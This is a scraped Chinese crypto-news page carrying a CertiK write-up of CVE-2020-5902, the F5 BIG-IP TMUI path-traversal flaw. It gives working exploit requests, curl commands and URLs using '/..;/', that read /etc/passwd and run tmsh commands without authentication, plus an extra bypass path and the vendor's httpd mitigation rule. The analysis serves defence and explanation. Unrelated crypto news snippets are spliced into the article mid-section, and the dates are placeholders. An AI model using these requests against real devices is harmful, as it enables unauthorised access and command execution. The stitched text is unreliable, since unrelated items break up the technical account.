買比特幣 買比特幣
Ctrl+D 買比特幣
ads
首頁 > XMR > Info

CER:CertiK:深度解析F5 BIG-IP遠程代碼執行漏洞-ODAILY_htt幣價格今日行情

Author:

Time:1900/1/1 0:00:00

前言

今日一早起來推特以及各大技術論壇上炸開了鍋,安全圈子的人都在討論F5設備里遠程代碼執行的漏洞。很多討論的內容,大部分是在分享如何尋找目標,利用漏洞,并沒有關于對漏洞成因的分析。CertiK的安全研究員下載了存在漏洞的程序,搭建環境復現漏洞后,對漏洞的起因進行了分析,并在下文分享給大家。

背景

F5BIG-IP是美國F5公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。PositiveTechnologies的研究人員MikhailKlyuchnikov發現其配置工具TrafficManagementUserInterface中存在遠程代碼執行漏洞,CVE編號為CVE-2020-5902。該漏洞CVSSv3評分為10分,攻擊者可利用該漏洞創建或刪除文件,關閉服務、執行任意的系統命令,最終獲得服務器的完全控制權。CVE具體表述請查看文章底部參考鏈接1。

受影響的BIG-IP軟件版本

漏洞利用

讀取任意文件:

curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

CertiK:5月份記錄了35次重大攻擊,總損失約為7330萬美元:金色財經報道,據CertiK監測,5月份記錄了35次重大攻擊,總損失約為7330萬美元。[2023/6/3 11:55:27]

遠程執行tmsh命令:

curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

官方給出的臨時修復方案(后文會對修復進行分析):

漏洞復現

在F5的官網注冊賬號之后,可以從F5的資源庫中下載存在漏洞的BIG-IP軟件。訪問參考鏈接2可以下載BIG-IPTMOS(TrafficManagementOperatingSystem,流量管理操作系統)的虛擬機鏡像。CertiK技術團隊因為使用VmwareFusion,下載的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-ImagefilesetforVMwareESX/iServer”。

在VmwareFusion中加載鏡像(import):

Cere Network宣布推出去中心化數據即服務Vision 2.0:10月21日消息,去中心化數據云平臺Cere Network宣布推出去中心化數據即服務(DaaS)Vision 2.0,旨在將數據控制權還給用戶和內容創作者,Vision 2.0將支持去中心化數據云(DDC)及其所支持的Cere工具和服務套件,包括Cere去中心化內容交付網絡、NFT鑄造平臺Freeport、Cere通用錢包、Cere NFT市場和內容管理系統(CMS)、Cere去中心化數據查看器(DDV)、以及通用NFT/內容注冊表、Cere實時體驗構建器(RXB)、改進的SDK/加密/解密包、視頻流等。[2022/10/21 16:34:29]

加載完成之后,使用默認用戶名密碼登陸系統:

用戶名:root

密碼:default

系統初始化之后,使用”ifconfig”命令查詢虛擬機IP地址。CertiK技術團隊的BIG-IPTMUI虛擬機IP地址為”172.16.4.137”。

在瀏覽器中訪問BIG-IPTMUI登陸界面:

https://172.16.4.137/tmui/login.jsp

Aave DAO與Balancer進行100萬美元的代幣互換:金色財經報道,在7月19日成功結束的鏈上投票之后,Aave社區與其他DeFi協議Balancer進行了 100萬美元的代幣交換。Aave DAO將16,907個AAVE代幣換成200,000個BAL代幣,基準利率為1 AAVE兌換11.892BAL。[2022/7/21 2:27:04]

復現任意文件讀取:

在瀏覽器中訪問以下地址可以讀取”/etc/passwd”文件內容:

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

復現tmsh命令執行:

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

去中心化交易所Balancer通過BAL流動性挖礦治理提案:Balancer協議于北京時間今日凌晨通過社區治理投票,再次修改其流動性挖礦獎金分配方案。Balancer以治理BAL為獎勵為流動性提供者每周發放獎勵。在新通過的提案中,每周14.5萬的BAL獎金(約合350萬美金)中將會有4.5萬(約合108萬美金)分發給BAL其它代幣交易對的流動性提供者。該提案被認為更偏向于以BAL為基礎的流動性池。[2020/8/25]

漏洞分析

在進入漏洞分析前,先要明確一點:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用戶登陸后本身是可以被訪問的。

下面的截圖顯示了登陸前和登陸后訪問以下URL的區別:

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

登陸前訪問:

mStable:已為USDC和WETH Balancer池分配25萬枚MTA獎勵:基于以太坊的穩定幣聚合協議mStable發推稱,已經為USDC和WETH Balancer池分配25萬枚MTA生態系統獎勵。下周,新的MTA/mUSD Balancer池將在現有池的基礎上獲得7.5萬枚MTA的獎勵。[2020/7/20]

被跳轉回登陸界面

輸入賬號密碼登陸管理界面之后再訪問,可執行fileRead.jsp讀取文件。

fileRead.jsp和tmshCmd.jsp雖然是在PoC中最終被利用的文件,但是他們并不是漏洞的起因。此漏洞的本質是利用Apache和后臺Java(tomcat)對URL的解析方式不同來繞過登陸限制,在未授權的情況下,訪問后臺JSP模塊。CertiK技術人員第一次注意到此類型漏洞是在2018年Orange的BlackHat演講:“BreakingParserLogicTakeYourPathNormalizationOffandPop0DaysOut”.這里可以查看演講稿件(參考鏈接2)。

這里我們可以理解在F5BIG-IP的后臺服務器對收到了URL請求進行了兩次的解析,第一次是httpd(Apache),第二次是后一層的Java(tomcat).

在URL在第一次被Apache解析時,Apache關注的是URL的前半段https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

當Apache在看見前半段是合法URL且是允許被訪問的頁面時,就把它交給了后面的第二層。Apache在這里完全把URL里面關鍵的/..;/給無視了。

在URL在第二次被解析時,后面的Java(tomcat)會把/..;/理解為,向上返回一層路徑。此時,/login.jsp/和/..;/會抵消掉。Tomcat看到的真正請求從

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

變成了:

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

再來fileRead.jsp并沒有對收到的請求進行身份驗證,后臺因此直接執行fileRead.jsp,讀取并返回了/etc/passwd文件的內容。

根據以上的思路,其實可以找出別的利用漏洞的URL,比如:

https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

這里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一樣,是一個不需要登陸就能訪問的頁面。但是因為要向上返回兩次,需要用兩個/..;/來抵消掉”/login/legal.html”。

回到開頭提到的官方給出的臨時修復方案,修復方案的本質是在httpd的配置中添加以下規則:

include'

<LocationMatch".*\\.\\.;.*">

Redirect404/

</LocationMatch>

'

這個規則的意思是,當http服務器在監測到URL中包含..;(句號句號分號)的時候,直接返回404.這樣利用漏洞的請求就沒辦法到達后臺(第二層)了。

如何避免漏洞:

此漏洞的利用方式在網絡上公開之后,因為它的攻擊成本低廉,大批黑客都開始圖謀利用此漏洞攻擊使用F5BIG-IP產品的系統。黑客只需要付出極小的代價就能獲得目標系統的控制權,對系統產生巨大的破壞。

俗話說:“不怕賊偷,就怕賊惦記”。即便這樣的黑客攻擊事件這次沒有發生在你身上,不代表你是安全的。因為很有可能黑客的下一個目標就是你。

而Certik的專業技術團隊會幫你徹底打消這種“賊惦記”的擔憂。CertiK專業滲透測試團隊會通過對此類事件的監測,第一時間給客戶提交漏洞預警報告,幫助客戶了解漏洞細節以及防護措施。此舉可以確保客戶的系統不受攻擊并且不會遭受財產損失。

同時作為一名安全技術人員,在新漏洞被發現的時,不僅需要知道漏洞是如何被黑客利用的,更要去探尋漏洞背后的原因,方可積累經驗,更加有能力在復雜的系統中發現隱藏的漏洞。

CertiK以及其技術人員,將永遠把安全當做信仰,與大家一同學習并一同成長。

參考鏈接

1.https://cve.mitre.org/

2.https://downloads.f5.com/

3.https://i.blackhat.com/

Tags:CERFILFILEHTTLanceriafil幣最新消息filecoin幣價htt幣價格今日行情

XMR
MXC:多空角逐即見分曉,重啟發力還是空頭瀑布-ODAILY_0XBTC

大家好,誠信立本,德行天下,用心研判趨勢和分析,傳遞有價值的投資理念!希望價有所值,值有所得!京東數科近日首度公開區塊鏈聯邦學習算法,把聯邦學習和區塊鏈結合,并在區塊鏈上構建聯邦學習算法.

1900/1/1 0:00:00
BTC:比特幣行情分析:猶記得前幾天暴跌在眼前-ODAILY_FCBTC

:最近,有人問持幣者行情有望回到12000一線嗎?我對此是沒有回答的,不是達不到,也不是達的到.

1900/1/1 0:00:00
300:比特幣風雨欲來,散戶冷眼旁觀,變盤近在咫尺-ODAILY_lbtc幣前景

短線行情分析及操作建議:這兩天行情越來越有意思了,整體上波動在9300-9000小區間內,關注我時間久的朋友應該都知道我本身在寫分析也好,還是做行情解讀也罷,很少用技術指標今天還是一樣.

1900/1/1 0:00:00
COI:比特幣昨日瀑布式下跌,多頭已經無力上行了嗎?-ODAILY_比特幣錢包手機版app

今日消息面 今日受美國獨立日假期影響,美股將休市一日。市場層面上,BTC夜間下挫至$9050,后反彈至$9100附近.

1900/1/1 0:00:00
GMT:行情分析:天雷勾地火,地動山也搖-ODAILY_BTC

市場解讀 大炮一響黃金萬兩,比特沒響以太先漲。以太絕非池中物,一遇消息便化龍。昨日不靠譜又搞事,在岸人民幣應聲大漲300個基點,創下三個月來新高;黃金收盤1860.

1900/1/1 0:00:00
GAT:OTC商家:幣圈最被忽視的悶聲發財群體-ODAILY_GATE

近年來,隨著加密貨幣交易市場的壯大,各大交易平臺陸續推出了OTC商家專屬服務和激勵計劃,其中不乏Gate.io等知名老牌交易所.

1900/1/1 0:00:00
ads